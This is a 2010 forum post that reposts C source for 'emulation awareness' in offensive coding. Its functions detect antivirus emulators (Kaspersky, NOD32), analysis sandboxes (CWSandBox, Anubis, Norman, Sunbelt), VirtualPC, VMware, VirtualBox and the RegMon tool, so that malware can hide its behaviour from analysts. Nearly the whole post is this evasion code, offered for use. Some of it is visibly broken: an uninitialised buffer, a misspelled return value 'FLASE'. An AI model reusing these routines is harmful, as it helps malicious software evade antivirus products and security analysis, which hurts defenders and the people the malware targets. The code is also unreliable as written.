begood Posted July 11, 2010 Report Posted July 11, 2010 Emulation Awareness for offensisiveC0ding a kindly provided by Gunther from ARTeam. Author: - E-Mail: - Evilcry's Dark Cave Evilcodecave’s Weblog ******************************************************************** Anti-KAV -> Call this one before WSAStartup(),so sockets wont be initialized. Anti-NOD32 -> sse1 instruction which nod32 cannot emulate. IsEmulator -> Timings Attack to Emulator Environement. IsCWSandBox -> Check if CreateProcess is hooked. IsAnubis -> Check whether it is running within Anubis. IsAnubis2 -> Check whether it is running within Anubis. IsNormanSandBox -> NormanSandBox Awareness. IsSunbeltSandBox -> Sunbelt Awareness. IsVirtualPC -> VirtualPC Awareness. IsVMware -> VMware Awareness. DetectVM -> Check whether it is running in VMWare, VirtualBox using registry. IsRegMonPresent -> Checking for RegMon by checking if the driver is loaded in memory and by searching for the window handle./* Emulation Awareness for offensisiveC0ding a kindly provided by Gunther from ARTeam. Author: - E-Mail: - http://evilcry.netsons.org http://evilcodecave.wordpress.com ******************************************************************** Anti-KAV -> Call this one before WSAStartup(),so sockets wont be initialized. Anti-NOD32 -> sse1 instruction which nod32 cannot emulate. IsEmulator -> Timings Attack to Emulator Environement. IsCWSandBox -> Check if CreateProcess is hooked. IsAnubis -> Check whether it is running within Anubis. IsAnubis2 -> Check whether it is running within Anubis. IsNormanSandBox -> NormanSandBox Awareness. IsSunbeltSandBox -> Sunbelt Awareness. IsVirtualPC -> VirtualPC Awareness. IsVMware -> VMware Awareness. DetectVM -> Check whether it is running in VMWare, VirtualBox using registry. IsRegMonPresent -> Checking for RegMon by checking if the driver is loaded in memory and by searching for the window handle. */// Anti-KAVvoid __forceinline anti_kav(void){ gethostbyname("microsoft.com"); DWORD key = (GetLastError() << 16) + GetLastError();// 276D276D DWORD dat = 0xE4AEE4AE; // 0xc3c3c3c3 (ret,ret,ret,ret) xored with 0x276D276D dat ^= key; __asm push dat __asm call esp}// Anti-NOD32void __forceinline antiemul(void){ __asm pminsw xmm0,xmm1}BOOL IsEmulator(void){ DWORD dwFirst , dwSecond; dwFirst= GetTickCount(); Sleep(500); dwSecond= GetTickCount(); if( (dwSecond - dwFirst )<500 ){ return TRUE; }else{ return FALSE; }}BOOL IsCWSandBox(void){ unsigned char cBuffer; unsigned long lProc= (unsigned long)GetProcAddress( GetModuleHandle( "KERNEL32.dll" ), "CreateProcessA" ); if( ReadProcessMemory( GetCurrentProcess(), (void *) lProc, &cBuffer, 1, NULL ) ){ if( cBuffer==0xE9 ){ return TRUE; } } return FALSE;}BOOL IsAnubis(void){ PROCESSENTRY32 pe32; DWORD PID= 0, PPID= 0, expPID= 0; HANDLE hSnapshot; pe32.dwSize= sizeof(PROCESSENTRY32); hSnapshot= CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if( Process32First(hSnapshot, &pe32) ){ while( Process32Next(hSnapshot, &pe32) ){ PID= pe32.th32ProcessID; if( PID==GetCurrentProcessId() ){ PPID= pe32.th32ParentProcessID; } if( !strcmp(pe32.szExeFile, "explorer.exe") ){ expPID= pe32.th32ProcessID; } } CloseHandle(hSnapshot); } if( PPID!=expPID ){ return TRUE; }else{ return FALSE; }}BOOL IsAnubis2(void){ char cFile[MAX_PATH]; BOOL dwRes= FALSE; if( strstr(cFile, "C:\\InsideTm\\") ){ dwRes= TRUE; } return dwRes;}BOOL IsNormanSandBox(void){ char szUserName[MAX_PATH]; DWORD dwUserNameSize= sizeof(szUserName); GetUserName(szUserName, &dwUserNameSize); if( !strcmp(szUserName, "CurrentUser") ){ return TRUE; }else{ return FALSE; }}BOOL IsSunbeltSandBox(void){ char szFileName[MAX_PATH]; GetModuleFileName(NULL, szFileName, MAX_PATH); if( !strcmp(szFileName, "C:\\file.exe") ){ return TRUE; }else{ return FALSE; }}BOOL IsVirtualPC(void){ __try{ __asm{ mov eax, 1 _emit 0x0F _emit 0x3F _emit 0x07 _emit 0x0B _emit 0xC7 _emit 0x45 _emit 0xFC _emit 0xFF _emit 0xFF _emit 0xFF _emit 0xFF } }__except(1){ return FALSE; } return TRUE;}BOOL IsVMware(void){ DWORD _EBX; __try{ __asm{ push ebx mov eax, 0x564D5868 mov ebx, 0x8685D465 mov ecx, 0x0A mov dx, 0x5658 in eax, dx mov _EBX, ebx pop ebx } }__except(1){ return FALSE; } return _EBX == 0x564D5868;}// Check whether it is running in VMWare, VirtualBox using registry.BOOL DetectVM(void){ HKEY hKey; int i; char szBuffer[64]; char *sProduct[] = { "*VMWARE*", "*VBOX*", "*VIRTUAL*" }; unsigned long hSize= sizeof(szBuffer) - 1; if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\Disk\\Enum", 0, KEY_READ, &hKey )==ERROR_SUCCESS ){ if( RegQueryValueEx( hKey, "0", NULL, NULL, (unsigned char *)szBuffer, &hSize )==ERROR_SUCCESS ){ for( i = 0; i < ( sizeof( sProduct ) / sizeof( char* ) ); i++ ){ if( strstr( szBuffer, sProduct[ i ] ) ){ RegCloseKey( hKey ); return TRUE; } } } RegCloseKey( hKey ); } return FLASE;}// Checking for RegMon by checking if the driver is loaded in memory and by searching for the window handle.BOOL IsRegMonPresent(void){ HANDLE hFile; HANDLE hWnd; // Check if the driver is loaded in the memory. hFile = CreateFile("\\\\.\\REGVXD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); if( hFile!=INVALID_HANDLE_VALUE ){ // RegMon found. return 1; } // Search for a window with a title " Registry Monitor ... ". hWnd= FindWindow(NULL, "Registry Monitor - Sysinternals: www.siliconrealms.com"); if( hWnd!=NULL ){ // RegMon found. return 1; } // RegMon not found. return 0;}http://evilcry.netsons.org/OC0/code/EmulationAwareness.cC | /* Emulation Awareness for off - Anonymous - nuhjxgLY - Pastebin.comgoogle search : emulation awareness Quote
